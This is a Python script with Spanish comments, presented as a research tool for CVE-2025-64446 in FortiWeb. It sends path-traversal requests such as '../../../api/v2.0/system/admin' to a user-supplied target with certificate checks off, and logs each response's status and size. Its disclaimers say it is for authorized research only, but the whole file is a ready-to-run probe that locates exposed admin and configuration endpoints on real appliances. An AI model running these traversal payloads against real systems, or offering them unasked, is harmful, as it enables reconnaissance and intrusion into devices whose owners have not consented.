#!/usr/bin/env python3
"""
CVE-2025-64446 Research Tool
HERRAMIENTA SOLO PARA INVESTIGACIÓN - NO EJECUTA COMANDOS
"""

import requests
import argparse
import json
import urllib3
from urllib.parse import urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class FortiWebResearch:
    def __init__(self, target, port=443, ssl=True):
        self.target = target
        self.port = port
        self.protocol = "https" if ssl else "http"
        self.base_url = f"{self.protocol}://{target}:{port}"
        self.session = requests.Session()
        self.session.verify = False
        
    def research_endpoints(self):
        """Investiga endpoints potencialmente afectados"""
        print("[*] Investigando endpoints...")
        
        research_paths = {
            "system_admin": "../../../api/v2.0/system/admin",
            "system_config": ".././../api/v2.0/system/config",
            "cmdb_system": "....//....//....//api/v2.0/cmdb/system",
        }
        
        results = {}
        
        for name, path in research_paths.items():
            try:
                url = urljoin(self.base_url, path)
                print(f"[*] Probando: {name} -> {path}")
                
                response = self.session.get(url, timeout=10)
                results[name] = {
                    'status_code': response.status_code,
                    'content_length': len(response.content),
                    'headers': dict(response.headers)
                }
                
                print(f"    Status: {response.status_code}, Size: {len(response.content)}")
                
            except Exception as e:
                print(f"    Error: {e}")
                results[name] = {'error': str(e)}
        
        return results

def main():
    print("""
    CVE-2025-64446 Research Tool
    ⚠️  SOLO PARA INVESTIGACIÓN Y EDUCACIÓN ⚠️
    """)
    
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', required=True, help='Target IP')
    parser.add_argument('-p', '--port', default=443, type=int, help='Target port')
    parser.add_argument('--http', action='store_true', help='Use HTTP')
    parser.add_argument('--check', action='store_true', help='Solo verificación')
    
    args = parser.parse_args()
    
    researcher = FortiWebResearch(args.target, args.port, not args.http)
    
    if args.check:
        print("[*] Modo verificación - Solo recolección de información")
    
    results = researcher.research_endpoints()
    
    print("\n[*] Resumen de investigación:")
    for endpoint, data in results.items():
        if 'error' not in data:
            print(f"    {endpoint}: Status {data['status_code']}, {data['content_length']} bytes")
    
    print("\n[*] Investigación completada")
    print("[!] Recuerda: Esta herramienta es solo para investigación autorizada")

if __name__ == "__main__":
    main()